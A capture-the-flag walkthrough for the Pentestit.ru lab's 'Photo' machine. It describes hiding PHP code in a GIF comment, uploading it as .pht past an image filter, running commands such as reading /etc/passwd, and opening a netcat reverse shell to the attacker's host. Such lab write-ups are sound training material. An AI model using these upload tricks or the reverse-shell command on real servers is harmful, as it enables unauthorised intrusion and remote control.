Pentestit.ru V.9 (Part 10) – Token Photo

Categories Tutorials

So, another day, another tutorial. πŸ˜€
And this time we are going to focus our efforts in “Photo” machine.
As usual we start the nmap scan from our “ssh server” shell, and we see that we have 2 open ports SSH and HTTP.

$ nmap 192.168.0.6 -sV

Starting Nmap 6.00 ( http://nmap.org ) at 2016-08-03 16:17 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
80/tcp open  http    nginx 1.10.0

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

So we start by the most obvious things, and we start using our gathered username/password combinations to try to access via SSH. It turns out that didn’t worked.
So we need to search and dig into the http page.
Accessing it we encounter the following page:vmware_2016-08-03_14-21-49
Searching for “url title PTT” (because of PPT in title of the page)
We found page https://packagist.org/packages/crowd/ptt

It seams this is a CMS created by crowd. We analyze the CMS and look for information about it but nothing useful comes to our attention, as such we should start to test this upload feature. We start by testing different files, like .txt, .doc, .py, .sh, .html till we find out that only image files were being accepted.

So if this page only accept images, maybe we could upload a php reverse shell, using tamper data, passing a shell, and make the server think it’s an image. Lets try that:vmware_2016-08-03_14-28-39
The result was:vmware_2016-08-03_14-30-08
So it seams the image was uploaded but then, probably the server runs a function to analyze it and identified it wasn’t an image after-all and deleted it. So it seams we really need an image file…

We start to use our old friend Google to look for ways to insert php code into an image, and it turns out that apparently we can add code to the “comments” metadata section of an image, and then invoke it via the browser. So let’s try that:gimp-2.8_2016-08-03_14-36-01
We then saved that image. And upload it to our “photo server”. (Tool used to add comments was GIMP2)
The image uploaded successfully:vmware_2016-08-03_14-38-16
So now let’s try invoke it:

http://192.168.0.6/upload/welcome4.gif?cmd=cat%20/etc/passwd

This only shows our image.
So it seams that it was uploaded successfully, but for some reason it was not handling our php code. This is were the secret was… the type of image had to be .pht (that was found sneak peeking the write-up), with this in mind, we changed the .gif to .pht and uploaded it.
The upload was successful (also):vmware_2016-08-03_14-48-02
When we tested it, we got something… πŸ˜€vmware_2016-08-03_14-48-33
Voila!!! It worked, so now we can run commands on the photo server.

We did some enumeration and found out that we have “nc” there. So we just need to setup a listener, and invoke the image with the following parameters:

192.168.0.6/upload/welcome4.pht?cmd=nc -nv 172.16.0.2 25432 -e /bin/bash

And there it was… our shell \o/vmware_2016-08-03_14-57-01
Now we just needed to go to our toket and see it’s contents

ls
Xiz9soo4qua
welcome4.pht
cd Xiz9soo4qua
ls
photo.txt
cat photo.txt
e*****h***t

2 Comments

  • Vira
    October 24, 2016

    Hi Buh.
    Thanks a lot for all your help.
    I get this token because of your instructions and patience. XD
    Thank you 4 share bro

    Regards

    • admin
      October 25, 2016

      Thanks for your comment πŸ™‚
      Glad I could help you out πŸ˜‰

Leave a Reply

Your email address will not be published. Required fields are marked *